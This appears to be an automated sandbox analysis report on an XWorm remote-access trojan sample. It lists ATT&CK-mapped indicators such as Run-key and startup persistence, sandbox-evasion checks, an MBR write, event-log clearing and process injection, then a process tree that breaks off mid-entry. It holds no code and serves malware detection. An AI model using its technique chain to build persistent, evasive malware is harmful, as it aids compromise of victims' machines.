xworm | a353bc34e2efa3ea7e4c04bb9d49c70ca45cdd151ed5519d946664b9c5c9282b

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation	XClient66.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation	DeadMdzj.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadM.lnk	DeadMdzj.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadM.lnk	DeadMdzj.exe

Executes dropped EXE 7 IoCs

pid	Process
3396	DeadMdzj.exe
1764	DeadMdzj.exe
2108	DeadR.exe
1376	DeadR.exe
2424	DeadM.exe
1736	DeadM.exe
2288	DeadM.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DeadM = "C:\\Users\\Admin\\AppData\\Roaming\\DeadM.exe"	DeadMdzj.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3864	powershell.EXE
4760	powershell.EXE

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\D:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

Drops file in System32 directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\DeadM	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3864 set thread context of 956	3864	powershell.EXE	89
PID 4760 set thread context of 1952	4760	powershell.EXE	90

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File created	C:\Windows\Logs\CBS\CBS.log	TrustedInstaller.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TrustedInstaller.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DeadR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DeadR.exe

Checks processor information in registry 2 TTPs 13 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4364	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3864	powershell.EXE
3864	powershell.EXE
4760	powershell.EXE
4760	powershell.EXE
3864	powershell.EXE
956	dllhost.exe
956	dllhost.exe
956	dllhost.exe
956	dllhost.exe
4760	powershell.EXE
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1164	wmiprvse.exe
1164	wmiprvse.exe
1164	wmiprvse.exe
1164	wmiprvse.exe
1952	dllhost.exe
1952	dllhost.exe
1164	wmiprvse.exe
1164	wmiprvse.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe
1952	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3396	DeadMdzj.exe
Token: SeDebugPrivilege	1764	DeadMdzj.exe
Token: SeDebugPrivilege	3864	powershell.EXE
Token: SeDebugPrivilege	4760	powershell.EXE
Token: SeDebugPrivilege	3864	powershell.EXE
Token: SeDebugPrivilege	956	dllhost.exe
Token: SeDebugPrivilege	4760	powershell.EXE
Token: SeDebugPrivilege	1952	dllhost.exe
Token: SeShutdownPrivilege	3632	Explorer.EXE
Token: SeCreatePagefilePrivilege	3632	Explorer.EXE
Token: SeAuditPrivilege	2984	svchost.exe
Token: SeDebugPrivilege	3396	DeadMdzj.exe
Token: SeShutdownPrivilege	3720	svchost.exe
Token: SeCreatePagefilePrivilege	3720	svchost.exe
Token: SeShutdownPrivilege	3720	svchost.exe
Token: SeCreatePagefilePrivilege	3720	svchost.exe
Token: SeShutdownPrivilege	3720	svchost.exe
Token: SeCreatePagefilePrivilege	3720	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2348	svchost.exe
Token: SeIncreaseQuotaPrivilege	2348	svchost.exe
Token: SeSecurityPrivilege	2348	svchost.exe
Token: SeTakeOwnershipPrivilege	2348	svchost.exe
Token: SeLoadDriverPrivilege	2348	svchost.exe
Token: SeBackupPrivilege	2348	svchost.exe
Token: SeRestorePrivilege	2348	svchost.exe
Token: SeShutdownPrivilege	2348	svchost.exe
Token: SeSystemEnvironmentPrivilege	2348	svchost.exe
Token: SeManageVolumePrivilege	2348	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2348	svchost.exe
Token: SeIncreaseQuotaPrivilege	2348	svchost.exe
Token: SeSecurityPrivilege	2348	svchost.exe
Token: SeTakeOwnershipPrivilege	2348	svchost.exe
Token: SeLoadDriverPrivilege	2348	svchost.exe
Token: SeSystemtimePrivilege	2348	svchost.exe
Token: SeBackupPrivilege	2348	svchost.exe
Token: SeRestorePrivilege	2348	svchost.exe
Token: SeShutdownPrivilege	2348	svchost.exe
Token: SeSystemEnvironmentPrivilege	2348	svchost.exe
Token: SeUndockPrivilege	2348	svchost.exe
Token: SeManageVolumePrivilege	2348	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2348	svchost.exe
Token: SeIncreaseQuotaPrivilege	2348	svchost.exe
Token: SeSecurityPrivilege	2348	svchost.exe
Token: SeTakeOwnershipPrivilege	2348	svchost.exe
Token: SeLoadDriverPrivilege	2348	svchost.exe
Token: SeSystemtimePrivilege	2348	svchost.exe
Token: SeBackupPrivilege	2348	svchost.exe
Token: SeRestorePrivilege	2348	svchost.exe
Token: SeShutdownPrivilege	2348	svchost.exe
Token: SeSystemEnvironmentPrivilege	2348	svchost.exe
Token: SeUndockPrivilege	2348	svchost.exe
Token: SeManageVolumePrivilege	2348	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2348	svchost.exe
Token: SeIncreaseQuotaPrivilege	2348	svchost.exe
Token: SeSecurityPrivilege	2348	svchost.exe
Token: SeTakeOwnershipPrivilege	2348	svchost.exe
Token: SeLoadDriverPrivilege	2348	svchost.exe
Token: SeSystemtimePrivilege	2348	svchost.exe
Token: SeBackupPrivilege	2348	svchost.exe
Token: SeRestorePrivilege	2348	svchost.exe
Token: SeShutdownPrivilege	2348	svchost.exe
Token: SeSystemEnvironmentPrivilege	2348	svchost.exe
Token: SeUndockPrivilege	2348	svchost.exe
Token: SeManageVolumePrivilege	2348	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3884 wrote to memory of 3396	3884	XClient66.exe	81
PID 3884 wrote to memory of 3396	3884	XClient66.exe	81
PID 3884 wrote to memory of 1764	3884	XClient66.exe	82
PID 3884 wrote to memory of 1764	3884	XClient66.exe	82
PID 3884 wrote to memory of 2108	3884	XClient66.exe	83
PID 3884 wrote to memory of 2108	3884	XClient66.exe	83
PID 3884 wrote to memory of 2108	3884	XClient66.exe	83
PID 3884 wrote to memory of 1376	3884	XClient66.exe	84
PID 3884 wrote to memory of 1376	3884	XClient66.exe	84
PID 3884 wrote to memory of 1376	3884	XClient66.exe	84
PID 3864 wrote to memory of 956	3864	powershell.EXE	89
PID 3864 wrote to memory of 956	3864	powershell.EXE	89
PID 3864 wrote to memory of 956	3864	powershell.EXE	89
PID 3864 wrote to memory of 956	3864	powershell.EXE	89
PID 3864 wrote to memory of 956	3864	powershell.EXE	89
PID 3864 wrote to memory of 956	3864	powershell.EXE	89
PID 3864 wrote to memory of 956	3864	powershell.EXE	89
PID 3864 wrote to memory of 956	3864	powershell.EXE	89
PID 956 wrote to memory of 600	956	dllhost.exe	5
PID 956 wrote to memory of 680	956	dllhost.exe	7
PID 956 wrote to memory of 960	956	dllhost.exe	12
PID 956 wrote to memory of 404	956	dllhost.exe	13
PID 956 wrote to memory of 456	956	dllhost.exe	14
PID 956 wrote to memory of 436	956	dllhost.exe	15
PID 956 wrote to memory of 1036	956	dllhost.exe	16
PID 956 wrote to memory of 1132	956	dllhost.exe	17
PID 956 wrote to memory of 1148	956	dllhost.exe	18
PID 956 wrote to memory of 1228	956	dllhost.exe	19
PID 956 wrote to memory of 1368	956	dllhost.exe	21
PID 956 wrote to memory of 1380	956	dllhost.exe	22
PID 956 wrote to memory of 1388	956	dllhost.exe	23
PID 956 wrote to memory of 1400	956	dllhost.exe	24
PID 956 wrote to memory of 1428	956	dllhost.exe	25
PID 956 wrote to memory of 1480	956	dllhost.exe	26
PID 956 wrote to memory of 1612	956	dllhost.exe	27
PID 956 wrote to memory of 1648	956	dllhost.exe	28
PID 956 wrote to memory of 1716	956	dllhost.exe	29
PID 956 wrote to memory of 1768	956	dllhost.exe	30
PID 956 wrote to memory of 1828	956	dllhost.exe	31
PID 956 wrote to memory of 1864	956	dllhost.exe	32
PID 956 wrote to memory of 1968	956	dllhost.exe	33
PID 956 wrote to memory of 1976	956	dllhost.exe	34
PID 956 wrote to memory of 1988	956	dllhost.exe	35
PID 956 wrote to memory of 2036	956	dllhost.exe	36
PID 956 wrote to memory of 1312	956	dllhost.exe	37
PID 956 wrote to memory of 2168	956	dllhost.exe	38
PID 956 wrote to memory of 2308	956	dllhost.exe	40
PID 956 wrote to memory of 2348	956	dllhost.exe	41
PID 956 wrote to memory of 2456	956	dllhost.exe	42
PID 956 wrote to memory of 2620	956	dllhost.exe	43
PID 956 wrote to memory of 2628	956	dllhost.exe	44
PID 956 wrote to memory of 2864	956	dllhost.exe	46
PID 956 wrote to memory of 2900	956	dllhost.exe	47
PID 956 wrote to memory of 2936	956	dllhost.exe	48
PID 956 wrote to memory of 2984	956	dllhost.exe	49
PID 956 wrote to memory of 3004	956	dllhost.exe	50
PID 956 wrote to memory of 3016	956	dllhost.exe	51
PID 956 wrote to memory of 3024	956	dllhost.exe	52
PID 956 wrote to memory of 3100	956	dllhost.exe	53
PID 956 wrote to memory of 3176	956	dllhost.exe	54
PID 956 wrote to memory of 3204	956	dllhost.exe	55
PID 956 wrote to memory of 3624	956	dllhost.exe	56
PID 956 wrote to memory of 3632	956	dllhost.exe	57
PID 956 wrote to memory of 3788	956	dllhost.exe	58

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:600
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1036
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cd6077db-8025-488a-9206-7204b9d8c119}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:956
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{24ba0dde-cacb-49eb-9f87-fa70b5fd2caa}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1952

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1368
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
